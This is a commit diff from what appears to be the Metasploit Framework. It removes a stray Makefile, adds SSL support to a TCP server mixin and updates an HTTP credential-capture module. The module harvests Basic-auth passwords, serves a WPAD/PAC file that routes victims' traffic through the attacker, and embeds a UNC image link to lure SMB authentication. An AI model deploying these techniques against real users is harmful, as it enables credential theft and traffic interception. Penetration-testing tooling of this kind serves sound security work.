Fixes #218. Updates the http password capture module. Removes a bogus makefile from the tree
git-svn-id: file:///home/svn/framework3/trunk@5452 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
8138c2259f
commit
1ea29ba8f0
|
@ -1,142 +0,0 @@
|
|||
|
||||
SHELL = /bin/sh
|
||||
|
||||
#### Start of system configuration section. ####
|
||||
|
||||
srcdir = .
|
||||
topdir = /usr/lib/ruby/1.8/i686-linux
|
||||
hdrdir = $(topdir)
|
||||
VPATH = $(srcdir):$(topdir):$(hdrdir)
|
||||
prefix = $(DESTDIR)/usr
|
||||
exec_prefix = $(DESTDIR)/usr
|
||||
sitedir = $(DESTDIR)/usr/lib/ruby/site_ruby
|
||||
rubylibdir = $(libdir)/ruby/$(ruby_version)
|
||||
archdir = $(rubylibdir)/$(arch)
|
||||
sbindir = $(exec_prefix)/sbin
|
||||
datadir = $(DESTDIR)/usr/share
|
||||
includedir = $(prefix)/include
|
||||
infodir = $(DESTDIR)/usr/share/info
|
||||
sysconfdir = $(DESTDIR)/etc
|
||||
mandir = $(DESTDIR)/usr/share/man
|
||||
libdir = $(DESTDIR)/usr/lib
|
||||
sharedstatedir = $(prefix)/com
|
||||
oldincludedir = $(DESTDIR)/usr/include
|
||||
sitearchdir = $(sitelibdir)/$(sitearch)
|
||||
bindir = $(exec_prefix)/bin
|
||||
localstatedir = $(DESTDIR)/var/lib
|
||||
sitelibdir = $(sitedir)/$(ruby_version)
|
||||
libexecdir = $(exec_prefix)/libexec
|
||||
|
||||
CC = i686-pc-linux-gnu-gcc
|
||||
LIBRUBY = $(LIBRUBY_SO)
|
||||
LIBRUBY_A = lib$(RUBY_SO_NAME)-static.a
|
||||
LIBRUBYARG_SHARED = -Wl,-R -Wl,$(libdir) -L$(libdir) -L. -l$(RUBY_SO_NAME)
|
||||
LIBRUBYARG_STATIC = -l$(RUBY_SO_NAME)-static
|
||||
|
||||
RUBY_EXTCONF_H =
|
||||
CFLAGS = -fPIC -O2 -march=pentium4 -fPIC
|
||||
INCFLAGS = -I. -I. -I/usr/lib/ruby/1.8/i686-linux -I.
|
||||
CPPFLAGS =
|
||||
CXXFLAGS = $(CFLAGS)
|
||||
DLDFLAGS =
|
||||
LDSHARED = $(CC) -shared
|
||||
AR = i686-pc-linux-gnu-ar
|
||||
EXEEXT =
|
||||
|
||||
RUBY_INSTALL_NAME = ruby18
|
||||
RUBY_SO_NAME = ruby18
|
||||
arch = i686-linux
|
||||
sitearch = i686-linux
|
||||
ruby_version = 1.8
|
||||
ruby = /usr/bin/ruby18
|
||||
RUBY = $(ruby)
|
||||
RM = rm -f
|
||||
MAKEDIRS = mkdir -p
|
||||
INSTALL = /bin/install -c
|
||||
INSTALL_PROG = $(INSTALL) -m 0755
|
||||
INSTALL_DATA = $(INSTALL) -m 644
|
||||
COPY = cp
|
||||
|
||||
#### End of system configuration section. ####
|
||||
|
||||
preload =
|
||||
|
||||
libpath = $(libdir)
|
||||
LIBPATH = -L'$(libdir)' -Wl,-R'$(libdir)'
|
||||
DEFFILE =
|
||||
|
||||
CLEANFILES =
|
||||
DISTCLEANFILES =
|
||||
|
||||
extout =
|
||||
extout_prefix =
|
||||
target_prefix =
|
||||
LOCAL_LIBS =
|
||||
LIBS = $(LIBRUBYARG_SHARED) -lorcon -ldl -lcrypt -lm -lc
|
||||
SRCS = Lorcon.c
|
||||
OBJS = Lorcon.o
|
||||
TARGET = Lorcon
|
||||
DLLIB = $(TARGET).so
|
||||
EXTSTATIC =
|
||||
STATIC_LIB =
|
||||
|
||||
RUBYCOMMONDIR = $(sitedir)$(target_prefix)
|
||||
RUBYLIBDIR = $(sitelibdir)$(target_prefix)
|
||||
RUBYARCHDIR = $(sitearchdir)$(target_prefix)
|
||||
|
||||
TARGET_SO = $(DLLIB)
|
||||
CLEANLIBS = $(TARGET).so $(TARGET).il? $(TARGET).tds $(TARGET).map
|
||||
CLEANOBJS = *.o *.a *.s[ol] *.pdb *.exp *.bak
|
||||
|
||||
all: $(DLLIB)
|
||||
static: $(STATIC_LIB)
|
||||
|
||||
clean:
|
||||
@-$(RM) $(CLEANLIBS) $(CLEANOBJS) $(CLEANFILES)
|
||||
|
||||
distclean: clean
|
||||
@-$(RM) Makefile $(RUBY_EXTCONF_H) conftest.* mkmf.log
|
||||
@-$(RM) core ruby$(EXEEXT) *~ $(DISTCLEANFILES)
|
||||
|
||||
realclean: distclean
|
||||
install: install-so install-rb
|
||||
|
||||
install-so: $(RUBYARCHDIR)
|
||||
install-so: $(RUBYARCHDIR)/$(DLLIB)
|
||||
$(RUBYARCHDIR)/$(DLLIB): $(DLLIB)
|
||||
$(INSTALL_PROG) $(DLLIB) $(RUBYARCHDIR)
|
||||
install-rb: pre-install-rb install-rb-default
|
||||
install-rb-default: pre-install-rb-default
|
||||
pre-install-rb: Makefile
|
||||
pre-install-rb-default: Makefile
|
||||
$(RUBYARCHDIR):
|
||||
$(MAKEDIRS) $@
|
||||
|
||||
site-install: site-install-so site-install-rb
|
||||
site-install-so: install-so
|
||||
site-install-rb: install-rb
|
||||
|
||||
.SUFFIXES: .c .m .cc .cxx .cpp .C .o
|
||||
|
||||
.cc.o:
|
||||
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
|
||||
|
||||
.cxx.o:
|
||||
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
|
||||
|
||||
.cpp.o:
|
||||
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
|
||||
|
||||
.C.o:
|
||||
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
|
||||
|
||||
.c.o:
|
||||
$(CC) $(INCFLAGS) $(CPPFLAGS) $(CFLAGS) -c $<
|
||||
|
||||
$(DLLIB): $(OBJS)
|
||||
@-$(RM) $@
|
||||
$(LDSHARED) $(DLDFLAGS) $(LIBPATH) -o $@ $(OBJS) $(LOCAL_LIBS) $(LIBS)
|
||||
|
||||
|
||||
|
||||
$(OBJS): ruby.h defines.h
|
|
@ -251,8 +251,9 @@ module Exploit::Remote::TcpServer
|
|||
|
||||
register_options(
|
||||
[
|
||||
Opt::SSL,
|
||||
OptAddress.new('SRVHOST', [ true, "The local host to listen on.", '0.0.0.0' ]),
|
||||
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ])
|
||||
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]),
|
||||
], Msf::Exploit::Remote::TcpServer)
|
||||
|
||||
register_evasion_options(
|
||||
|
@ -309,6 +310,7 @@ module Exploit::Remote::TcpServer
|
|||
self.service = Rex::Socket::TcpServer.create(
|
||||
'LocalHost' => srvhost,
|
||||
'LocalPort' => srvport,
|
||||
'SSL' => ssl,
|
||||
'Context' =>
|
||||
{
|
||||
'Msf' => framework,
|
||||
|
@ -389,6 +391,14 @@ module Exploit::Remote::TcpServer
|
|||
datastore['SRVPORT']
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the SSL option
|
||||
#
|
||||
def ssl
|
||||
datastore['SSL']
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Re-generates the payload, substituting the current RHOST and RPORT with
|
||||
# the supplied client host and port from the socket.
|
||||
|
|
|
@ -25,19 +25,23 @@ module Rex::Socket::SslTcpServer
|
|||
|
||||
def accept(opts = {})
|
||||
sock = super()
|
||||
if (sock)
|
||||
sock.extend(Rex::Socket::Tcp)
|
||||
sock.context = self.context
|
||||
pn = sock.getpeername
|
||||
return nil if not sock
|
||||
|
||||
sock.extend(Rex::Socket::Tcp)
|
||||
sock.context = self.context
|
||||
pn = sock.getpeername
|
||||
|
||||
sock.peerhost = pn[1]
|
||||
sock.peerport = pn[2]
|
||||
end
|
||||
t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx)
|
||||
t.extend(Rex::Socket::Tcp)
|
||||
t.accept
|
||||
|
||||
t
|
||||
begin
|
||||
t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx)
|
||||
t.extend(Rex::Socket::Tcp)
|
||||
t.peerhost = pn[1]
|
||||
t.peerport = pn[2]
|
||||
t.accept
|
||||
t
|
||||
rescue ::OpenSSL::SSL::SSLError
|
||||
sock.close
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
@ -65,8 +69,8 @@ module Rex::Socket::SslTcpServer
|
|||
|
||||
cert.subject = subject
|
||||
cert.issuer = issuer
|
||||
cert.not_before = Time.now
|
||||
cert.not_after = Time.now + 3600
|
||||
cert.not_before = Time.now - 7200
|
||||
cert.not_after = Time.now + 7200
|
||||
cert.public_key = key.public_key
|
||||
ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)
|
||||
cert.extensions = [
|
||||
|
|
|
@ -53,6 +53,8 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run
|
||||
@myhost = datastore['SRVHOST']
|
||||
@myport = datastore['SRVPORT']
|
||||
exploit()
|
||||
end
|
||||
|
||||
|
@ -91,27 +93,30 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def dispatch_request(cli, req)
|
||||
|
||||
|
||||
mysrc = Rex::Socket.source_address(cli.peerhost)
|
||||
hhead = (req['Host'] || @myhost).split(':', 2)[0]
|
||||
|
||||
if(req['Authorization'] and req['Authorization'] =~ /basic/i)
|
||||
basic,auth = req['Authorization'].split(/\s+/)
|
||||
user,pass = Rex::Text.decode_base64(auth).split(':', 2)
|
||||
report_auth_info(
|
||||
:host => cli.peerhost,
|
||||
:proto => 'http',
|
||||
:targ_host => req['Host'] || datastore['SRVHOST'],
|
||||
:targ_port => datastore['SRVPORT'],
|
||||
:targ_host => hhead,
|
||||
:targ_port => @myport,
|
||||
:user => user,
|
||||
:pass => pass,
|
||||
:extra => req.resource.to_s
|
||||
)
|
||||
print_status("HTTP LOGIN #{req['Host']}:#{datastore['SRVPORT']} #{user} / #{pass} => #{req.resource}")
|
||||
print_status("HTTP LOGIN #{cli.peerhost} > #{hhead}:#{@myport} #{user} / #{pass} => #{req.resource}")
|
||||
end
|
||||
|
||||
if(req.resource =~ /^wpad.dat|.*\.pac$/i)
|
||||
prx = "function FindProxyForURL(url, host) { return 'PROXY #{Rex::Socket.source_address(cli.peerhost)}:#{datastore['SRVPORT']}'; }"
|
||||
prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }"
|
||||
res =
|
||||
"HTTP/1.1 200 OK\r\n" +
|
||||
"Host: #{req['Host'] || datastore['SRVHOST']}\r\n" +
|
||||
"Host: #{hhead}\r\n" +
|
||||
"Content-Type: application/x-ns-proxy-autoconfig\r\n" +
|
||||
"Content-Length: #{prx.length}\r\n" +
|
||||
"Connection: Close\r\n\r\n#{prx}"
|
||||
|
@ -120,9 +125,9 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
|
|||
return
|
||||
end
|
||||
|
||||
print_status("HTTP REQUEST #{req['Host']}:#{datastore['SRVPORT']} #{req.resource}")
|
||||
print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource}")
|
||||
|
||||
data = "<html><head><title>Connecting...</title></head><body><img src='\\\\#{Rex::Socket.source_address(cli.peerhost)}\\public\\loading.jpg' width='1' height='1'></body></html>"
|
||||
data = "<html><head><title>Connecting...</title></head><body><img src='\\\\#{mysrc}\\public\\loading.jpg' width='1' height='1'></body></html>"
|
||||
res =
|
||||
"HTTP/1.1 200 OK\r\n" +
|
||||
"Host: #{req['Host'] || datastore['SRVHOST']}\r\n" +
|
||||
|
|
Loading…
Reference in New Issue